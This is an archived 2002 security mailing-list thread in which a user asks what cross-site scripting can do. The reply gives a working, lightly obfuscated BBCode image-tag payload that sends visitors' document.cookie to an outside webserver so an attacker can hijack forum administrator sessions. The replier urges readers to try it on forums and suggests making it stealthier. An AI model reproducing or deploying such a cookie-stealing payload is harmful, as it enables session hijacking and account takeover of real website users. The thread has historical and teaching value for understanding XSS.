Re: CSS Question

From: rat@r4t.tmfweb.nl
Date: 01/15/02 

From: "rat@r4t.tmfweb.nl" <r4t@r4t.tmfweb.nl>
To: <security-basics@securityfocus.com>, "A***" <abdulla@mail.auk.kg>
Date: Tue, 15 Jan 2002 01:24:48 +0100

Well thats just the thing. If you are able to the the session of the
webforum admin, you can control it, and adminitrator it. Sometimes forum
passwords are the same as login passwords... On the otherhand some forums
do store passwds in their cookies.

Try this on a forum:

[img]javascript:window.open('htt'+'p://ww'+'w.wittenburg10c.nl/images/w.gif?
cookie='+escape(document.cookie))[/img]

this got expanded to: <img
src=javascript:window.open('htt'+'p://ww'+'w.wittenburg10c.nl/images/w.gif?c
ookie='+escape(document.cookie))>

This will store the cookie in my webserver logs.. and it worked for some
versions of a local forum. And this is just a proof of concept and can be
much meaner, like hiding the just new opened window..

Have fun,
_rAt_

----- Original Message -----
From: "A***" <abdulla@mail.auk.kg>
To: <security-basics@securityfocus.com>
Sent: Saturday, January 12, 2002 1:43 PM
Subject: CSS Question

> Hi!
> There are a lot of CSS vuln discovered everyday. As i have understood
> Cross site scripting is all about stealing a cookie, right? Cookies do not
> contain logins and passwords in them. So what is so important about them?
I
> know that you can steal someone's session id and enter his mailbox but
still
> you are limited. I am not quite familiar with it so my question is what is
the
> worst thing attacker can do (besides stealing cookie), with a website
which is
> vulnerable to cross site scripting? Please enlighten me! Thanks
>
>
>
>
> ---------------------------------------------
> This message was sent using Endymion MailMan.
> http://www.endymion.com/products/mailman/
>
>
>